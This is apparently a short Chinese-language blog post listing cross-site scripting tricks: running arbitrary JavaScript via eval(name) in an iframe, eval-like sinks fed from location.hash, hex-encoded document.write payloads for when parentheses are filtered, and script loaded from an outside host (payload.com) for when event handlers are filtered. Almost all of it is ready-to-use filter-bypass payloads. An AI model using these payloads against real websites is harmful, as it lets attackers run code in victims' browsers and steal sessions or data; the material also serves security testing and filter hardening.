0x00 前言
总结的一些xss的技巧(可能会持续更新),愿大佬勿喷,还有什么方法,大佬记得分享啊。有什么看不惯的错误请在本文留言,谢谢。
0x01 我认为最短的执行任意js代码
eval(name);
poc:
<iframe src='http://localhost/?xss=eval(name);' name='js-code'>
0x02 类似eval的方法
setTimeout(location.hash.slice(1))
setInterval(location.hash.slice(1))
Function(location.hash.slice(1))(1)
jQuery.globalEval(location.hash.slice(1))
document.write`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e`
document.getElementById('xx').innerHTML=`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e`
0x03 当括号被过滤执行任意payload的方法
document.write`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e`
<svg/onload="location='javascript:/*'%2blocation.hash">
锚点后接*/jscode
0x04 事件被过滤时执行任意payload
<link rel=import href=\\payload.com>
<script src=\\payload.com></script>
<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>